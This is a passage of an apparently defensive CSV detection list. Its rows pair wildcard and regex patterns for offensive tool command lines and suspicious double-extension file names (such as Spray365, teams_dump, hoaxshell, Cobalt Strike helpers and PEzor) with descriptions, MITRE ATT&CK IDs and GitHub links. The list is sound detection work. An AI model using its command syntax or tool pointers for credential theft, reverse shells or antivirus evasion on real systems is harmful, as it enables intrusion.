UsrClass.dat*",".{0,1000}\.py\s\-\-ntuser\sNTUSER\.DAT\s\-\-usrclass\sUsrClass\.dat.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","9","1","19","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z" "*.py --server amsi --file *.exe*",".{0,1000}\.py\s\-\-server\samsi\s\-\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","9","4","316","34","2023-09-30T12:28:42Z","2022-05-19T12:12:34Z" "*.py spray -ep *",".{0,1000}\.py\sspray\s\-ep\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","4","325","56","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z" "*.py -t ldap://* --no-wcf-server --escalate-user *",".{0,1000}\.py\s\-t\sldap\:\/\/.{0,1000}\s\-\-no\-wcf\-server\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*.py -t template.tpe -c 'calc.exe'*",".{0,1000}\.py\s\-t\stemplate\.tpe\s\-c\s\'calc\.exe\'.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004?","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","9","1","92","12","2024-04-17T14:03:13Z","2024-04-17T13:00:12Z" "*.py teams --get*",".{0,1000}\.py\steams\s\-\-get.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*.py teams --list*",".{0,1000}\.py\steams\s\-\-list.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*.py -u * ?print-zones *",".{0,1000}\.py\s\-u\s.{0,1000}\s\?print\-zones\s.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *",".{0,1000}\.py\s\-\-zip\s\-c\sAll\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-\-hashes\s\'ffffffffffffffffffffffffffffffff\'\:.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*.py* --localtunnel *",".{0,1000}\.py.{0,1000}\s\-\-localtunnel\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*.py* --ngrok *",".{0,1000}\.py.{0,1000}\s\-\-ngrok\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*.py* --payload *.ps1*",".{0,1000}\.py.{0,1000}\s\-\-payload\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","10","10","623","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z" "*.py* service -action create -service-name *",".{0,1000}\.py.{0,1000}\sservice\s\-action\screate\s\-service\-name\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*.py* -service-name * -hashes *",".{0,1000}\.py.{0,1000}\s\-service\-name\s.{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "*.py*.ccache *.kirbi *",".{0,1000}\.py.{0,1000}\.ccache\s.{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "*.py*.kirbi *.ccache*",".{0,1000}\.py.{0,1000}\.kirbi\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","1","N/A","10","2","163","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z" "*.py*found-users.txt*",".{0,1000}\.py.{0,1000}found\-users\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*.rar.exe*",".{0,1000}\.rar\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rar.iso*",".{0,1000}\.rar\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.resources.123456.*",".{0,1000}\.resources\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.reverst.tunnel:*",".{0,1000}\.reverst\.tunnel\:.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*.revshells.com*",".{0,1000}\.revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.bat*",".{0,1000}\.rtf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.dll*",".{0,1000}\.rtf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.exe*",".{0,1000}\.rtf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.htm*",".{0,1000}\.rtf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.jar*",".{0,1000}\.rtf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.js*",".{0,1000}\.rtf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.sfx*",".{0,1000}\.rtf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.rtf.vbs*",".{0,1000}\.rtf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*.sccmhunter*",".{0,1000}\.sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/garrettfoster13/sccmhunter","1","0","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*.search.123456.*",".{0,1000}\.search\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.secure.123456.*",".{0,1000}\.secure\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.sh *--checksec*",".{0,1000}\.sh\s.{0,1000}\-\-checksec.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*.sh *cvelist-file:*",".{0,1000}\.sh\s.{0,1000}cvelist\-file\:.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*.sh -format=bof *.exe*",".{0,1000}\.sh\s\-format\=bof\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sh -format=service-dll *",".{0,1000}\.sh\s\-format\=service\-dll\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sh -format=service-exe *",".{0,1000}\.sh\s\-format\=service\-exe\s.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sh -xorkey=*",".{0,1000}\.sh\s\-xorkey\=.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*.sharpgen *",".{0,1000}\.sharpgen\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","0","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*.ShellcodeRDI*",".{0,1000}\.ShellcodeRDI.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*.sites.123456.*",".{0,1000}\.sites\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.SliverRPC/*",".{0,1000}\.SliverRPC\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*.smtp.123456.*",".{0,1000}\.smtp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.ssl.123456.*",".{0,1000}\.ssl\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*.stage.123456.*",".{0,1000}\.stage\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","dns beacons - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 